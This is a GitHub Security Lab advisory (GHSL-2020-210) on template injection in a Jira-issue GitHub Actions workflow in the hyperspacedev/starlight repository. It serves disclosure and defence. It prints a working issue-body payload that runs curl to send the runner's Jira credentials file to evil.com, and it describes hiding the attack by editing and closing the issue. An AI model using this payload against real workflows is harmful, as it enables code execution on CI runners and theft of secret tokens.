Automatic GitHub workflow in hyperspacedev/starlight repository is vulnerable to template injection from user comments.
hyperspacedev/starlight repository
Root branch.
atlassian/gajira-create
Jira Create issue
step in jira-create.yml workflow is vulnerable to template injection.
${{ github.event.issue.title }}
and ${{ github.event.issue.body }}
are used to format input values to atlassian/gajira-create
action:
- name: Jira Create issue
uses: atlassian/gajira-create@v2.0.0
with:
project: HS
issuetype: Task
summary: ${{ github.event.issue.title }}
description: ${{ github.event.issue.body }}
The action has a hidden feature - it expands {{}}
internally. This way when the comment body contains an expression in double curly braces it is evaluated by node.js in these actions.
This vulnerability allows for arbitrary code execution in the context of GitHub runner. For example a user may create an issue with the body:
{{ process.mainModule.require('child_process').exec(`curl -d @${process.env.HOME}/.jira.d/credentials http://evil.com`) }}
which will exfiltrate the secret Jira API token to the attacker controlled server. To make the attack less visible an attacker may modify the issue to Never mind my bad
and close it.
This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).
You can contact the GHSL team at securitylab@github.com
, please include a reference to GHSL-2020-210
in any communication regarding this issue.